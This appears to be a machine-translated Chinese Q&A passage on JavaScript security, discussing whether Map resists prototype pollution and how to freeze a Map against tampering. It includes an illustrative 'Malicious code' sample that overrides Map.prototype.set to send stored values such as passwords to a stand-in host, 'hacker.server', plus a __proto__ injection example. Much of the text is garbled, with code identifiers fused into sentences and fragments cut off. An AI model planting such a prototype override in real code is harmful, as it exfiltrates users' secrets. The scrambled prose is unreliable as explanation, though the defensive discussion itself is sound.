关于 JavaScript 的安全性
MapsMap 原语是在 ES6 中引入的。 Map数据结构存储键/值对,不易受到原型污染。 [1]
它本质上是一个 HashMap,但没有
所具有的所有安全警告。当需要键/值结构时,Object应优先于Map。 [2]Object
事实上,您可以使用传统技术替换
Map'sconst myMap = new Map();
// Malicious code
const oldSet = Map.prototype.set;
Map.prototype.set = function(key, value) {
const img = new Image();
img.src = 'https://hacker.server/?' + JSON.stringify(value);
return oldSet.call(this, key, value);
};
// Your data is now stolen
myMap.set('password', 'hunter2');
大概,这些作者所说的“不易受到原型污染”的意思仅限于这样一个事实:这种类型的注入攻击不适用于
Mapconst myMap = new Map();
myMap.set('__proto__', {isAdmin: true});
myMap.get('isAdmin'); // undefined
...与处理对象的方式相同:
const obj = {};
obj['__proto__'] = {isAdmin: true};
obj.isAdmin; // true
正确吗?
他们的意思是访问
Map比较:
let prop = 'constructor';
const myObj = {};
console.log(myObj[prop]);与
let prop = 'constructor';
const myMap = new Map();
console.log(myMap.get(prop));使用对象时,必须使用
hasOwnProperty()for (var key in p) {
if (p.hasOwnProperty(key)) {
console.log(key + " -> " + p[key]);
}
}
(请注意,使用
Object.keys()这也意味着您不能创建与从原型继承的属性冲突的自己的属性(除非您故意想要覆盖它们)。
请注意,在 ES6 中,对象自省的新函数作为普通函数添加到
ObjectObject.entries()Object.prototype.entries()什么是原型污染?原型污染是一个漏洞 使威胁行为者能够利用 JavaScript 运行时。
如果我们在这里讨论安全性,因为
Objectfreeze但是你可以冻结
MapObject.freeze(myMap.__proto__);当然,上面的方法可能仍然太粗略,所以如果您只想冻结单个
MapsetmyMap例如。运行下面的代码,注意
stolenmyMapMapconst myMap = new Map();
myMap.set = Map.prototype.set.bind(myMap);
Object.freeze(myMap);
//Object.freeze above might not make any
//difference here, but it's still a good
//idea to freeze, in case you pass
//the Map to a 3rd party lib.
// Malicious code
const oldSet = Map.prototype.set;
Map.prototype.set = function(key, value) {
// Your data is now stolen
console.log(`stolen ${key}:${value}`);
return oldSet.call(this, key, value);
};
console.log('using secure myMap');
myMap.set('password', 'hunter2');
const notSecure = new Map();
console.log('using insecure Map');
notSecure.set('password', 'hunter2');